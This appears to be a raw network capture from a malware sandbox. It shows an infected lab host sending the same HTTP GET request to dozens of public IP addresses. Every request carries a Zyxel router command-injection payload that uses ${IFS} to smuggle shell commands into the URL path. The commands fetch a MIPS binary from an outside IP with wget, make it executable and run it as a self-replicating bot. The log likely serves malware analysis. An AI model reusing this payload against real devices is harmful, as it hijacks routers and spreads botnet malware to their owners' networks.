                                                      Feb 2, 2024 06:36:04.892349005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7391192.168.2.1450832130.233.154.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892404079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7392192.168.2.1456722203.190.81.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892450094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7393192.168.2.1434276115.51.166.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892488003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7394192.168.2.145363895.252.22.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892524004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7395192.168.2.1455772128.215.132.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892548084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7396192.168.2.1447104194.244.23.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892599106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7397192.168.2.14457348.161.248.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892623901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7398192.168.2.1453216213.133.115.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892672062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7399192.168.2.1440768154.65.212.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892726898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7400192.168.2.145110639.62.93.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892754078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7401192.168.2.1434538121.239.94.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892803907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7402192.168.2.145565224.190.227.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892832041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7403192.168.2.1458612139.204.164.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892895937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7404192.168.2.143778673.66.172.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892929077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7405192.168.2.1446088169.31.113.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892965078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7406192.168.2.1445830158.163.78.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893023014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7407192.168.2.144200082.120.4.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893058062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7408192.168.2.1436722196.235.221.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893110037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7409192.168.2.145471450.212.118.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893160105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7410192.168.2.145290443.129.234.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893193007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7411192.168.2.144605818.137.69.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893243074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7412192.168.2.145822088.31.242.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893280983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7413192.168.2.1457244107.145.161.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893311977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7414192.168.2.144100672.174.75.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893368959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7415192.168.2.1459650139.199.140.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893407106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7416192.168.2.1459948137.149.185.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893451929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7417192.168.2.1450728208.177.197.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893491030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7418192.168.2.1444590198.118.112.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893513918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7419192.168.2.1456416100.158.64.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893574953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7420192.168.2.1438496131.134.202.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893625021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7421192.168.2.1449184169.180.219.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893655062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7422192.168.2.145548450.97.170.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893708944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7423192.168.2.143549032.61.7.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893744946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7424192.168.2.1434338106.205.216.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893790960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7425192.168.2.144793050.24.138.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893831968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7426192.168.2.144535672.115.90.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893898964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7427192.168.2.1439356164.7.37.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.893939018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7428192.168.2.144087641.110.136.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894006014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7429192.168.2.143320637.157.244.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894027948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7430192.168.2.1443114168.33.103.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894068956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7431192.168.2.1443556213.14.252.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894113064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7432192.168.2.145465857.219.99.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894167900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7433192.168.2.1454064109.26.206.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894193888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7434192.168.2.1433388223.26.102.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894253969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7435192.168.2.144859291.86.189.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.894282103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7436192.168.2.143797088.197.11.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.897502899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7437192.168.2.1459394144.185.64.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.897533894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7438192.168.2.1433510198.112.155.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907210112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7439192.168.2.146000077.168.50.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907260895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7440192.168.2.1459524219.235.24.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907285929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7441192.168.2.144096686.71.193.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907347918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7442192.168.2.1445342173.64.71.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907383919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7443192.168.2.144715679.22.99.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907430887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7444192.168.2.145388840.164.27.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907468081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7445192.168.2.1445988132.61.62.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907516003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7446192.168.2.1437038179.217.161.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907548904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7447192.168.2.146017641.89.146.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907577991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7448192.168.2.1452316166.106.140.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907627106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7449192.168.2.1449342169.139.32.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907674074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7450192.168.2.144397074.30.78.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907713890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7451192.168.2.1441964154.112.88.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907751083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7452192.168.2.1435098200.244.173.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907799006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7453192.168.2.1436688112.143.38.217443
                                                      TimestampBytes transferredDirectionData
